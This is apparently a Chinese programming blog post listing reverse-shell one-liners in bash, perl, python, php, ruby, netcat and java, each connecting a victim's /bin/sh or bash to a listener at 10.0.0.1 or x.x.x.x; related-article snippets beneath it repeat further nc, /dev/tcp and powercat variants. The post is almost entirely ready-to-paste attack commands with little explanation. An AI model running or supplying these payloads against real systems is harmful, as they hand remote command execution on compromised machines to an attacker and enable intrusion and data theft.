反弹shell的几种方法

最新推荐文章于 2024-08-08 21:06:47 发布
最新推荐文章于 2024-08-08 21:06:47 发布
阅读量4.2k 收藏 2
点赞数 1
分类专栏: 杂类
bash版本:
?
1
bash -i >& /dev/tcp/10 .0.0.1 /8080 0>&1

 

,注意某些linux不支持
 
perl版本:
 
?
1
2
3
4
5
perl -e ' use Socket; $i = "10.0.0.1" ; $p =1234;
socket (S,PF_INET,SOCK_STREAM, getprotobyname ( "tcp" ));
if ( connect (S,sockaddr_in( $p ,inet_aton( $i )))){ open (STDIN, ">&S" );
open (STDOUT, ">&S" );
open (STDERR, ">&S" ); exec ( "/bin/sh -i" );};'

 

python版本:
 
?
1
2
3
python - c ' import socket,subprocess,os;s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(( "10.0.0.1" , 1234 ));os.dup2(s.fileno(), 0 ); os.dup2(s.fileno(), 1 );
os.dup2(s.fileno(), 2 );p = subprocess.call([ "/bin/sh" , "-i" ]);'

 

php版本:
 
?
1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby版本:
 
?
1
2
ruby -rsocket -e'f=TCPSocket.open( "10.0.0.1" , 1234 ).to_i;
exec sprintf( "/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'
nc版本:
 
?
1
2
3
4
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

 

java版本
 
?
1
2
3
4
r = Runtime.getRuntime()
p = r.exec([ "/bin/bash" , "-c" ,"exec 5 <>/dev/tcp/ 10.0 . 0.1 / 2002 ;cat
  <& 5 | while read line; do \$line 2 >& 5 >& 5 ; done"] as String[])
p.waitFor()

 

stonesharp
关注
专栏目录
反弹cmd
qq_41861225的博客
01-21 1197
**前言:**我们在学习的过程中经常会听见“反弹shell”一词,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。同理我们也可以自己实现一套反弹cmd的操作。 ...
Windows反弹Shell
qq_62073002的博客
04-26 1030
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
常见 反弹shell方法
qq_48368964的博客
08-08 1352
nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令,bash 运行后将命令执行结果返回 5555 端口,攻击者主机上也是打开两个终端分别执行监听。#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口。反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip。
Python Paramiko模块-exec_command() 和 invoke_shell() 两种操作方式
qq_27371025的博客
02-20 1444
exec_command()函数是将服务器执行完的结果一次性返回给你; invoke_shell()函数类似shell终端,可以将执行结果分批次返回,看到任务的执行情况,不会因为执行一个很长的脚本而不知道是否执行成功
python paramiko invoke_shell_Python,paramiko,invoke_shell和丑陋的字符
weixin_39531594的博客
12-09 572
当我运行以下Python代码时:import workflowimport consoleimport paramikoimport timestrComputer = 'server.com'strUser = 'user'strPwd = 'passwd'client = paramiko.SSHClient()client.set_missing_host_key_policy(parami...
python paramiko exec_command()和invoke_shell()
lixiaomei0623的专栏
04-15 1万+
paramiko模块exec_command()函数是将服务器执行完的结果一次性返回给你; invoke_shell()函数类似shell终端,可以将执行结果分批次返回,看到任务的执行情况,不会因为执行一个很长的脚本而不知道是否执行成功 exec_command(): invoke_shell() python 操作ssh--有more用invoke_shell循环获取数据 # 实例化SSHClient client = paramiko.SSHClient() # 自动添加策略..
详解NC反弹shell几种方法
01-08
正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1...
反弹shell几种获取方式.docx
最新发布
08-19
一、反弹shell 二、python pty 方式 三、suid提权的方式 1、 suid权限的设置 2、 找出系统中具有suid权限的命令 3、 find提权 四、sessions的使用方法
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1413
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 724
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
cmd反弹shell提权
10-24
cmd反弹shell提权
渗透测试-window反弹shell
lza20001103的博客
05-11 4731
window反弹shell
python ssh实时交互_使用Paramiko在Python中实现ssh上的交互式shell
weixin_39562554的博客
12-08 794
import paramikoimport reclass ShellHandler:def __init__(self, host, user, psw):self.ssh = paramiko.SSHClient()self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())self.ssh.connect(host, usern...
PowerSploit 之 Invoke-ShellCode
weixin_46104215的博客
11-08 1618
Shellcode为16进制的机器码,根据不同的任务可能是发出一条系统调用或建立一个高权限的ShellShellcode也就由此得名。它的最终目的是取得目标机器的控制权。(一段用于利用软件漏洞而执行的代码) 反向连接的shellcode: 当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用shellcode建立了服务后门,还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接.
window反弹shell
mingyqf的博客
02-16 1190
1.nc反弹shell 远程服务器 nc 监听命令 nc -vlnp 8080 受害者反弹 shell 命令,每种语言都有 sock 连接命令,可以根据不通过的环境,选择合适的命令。 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 2.powershell反弹cmd powercat是netcat的powershell版本 所以可以放在可被访问的远程服务器上。执行命令的时候,自动下载执行。 http://192.168.0.195/powercat
反弹shell命令
Shanfenglan's blog
10-29 2680
文章目录Bash TCPBash UDP:Netcat:Ncat:Telnet:Socat:Perl:Python:PHP:Ruby:OpenSSL:Powershell:Awk:TCLshJava:War:Lua:NodeJS:Groovy:Meterpreter Shell:Xterm: Bash TCP bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 /bin/bash -i > /dev/tcp/127.0.0.1/8080 0&l
cmd 返回值_渗透不会反弹shell?来教你写一个cmd的shell
weixin_39756235的博客
11-20 139
原创 lengyi 合天智汇包含的库:#include <winsock2.h> #include <windows.h> #include <ws2tcpip.h> #include <iostream> #include <string> #pragma comment(lib, "Ws2_32.lib") #define DEFA...
渗透不会反弹shell?来教你写一个cmd的shell
蚁景网安学院
02-20 359
渗透不会反弹shell?来教你写一个cmd的shell包含的库:#include <winsock2.h> #include <windows.h> #inclu...
NC 反弹shell
08-30
几种方法可以实现NC反弹shell。其中一种是使用bash反弹,命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 请注意,这种方法需要在控制机器上执行。 另一种方法是使用NC命令进行反向连接,命令如下: ``` nc ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值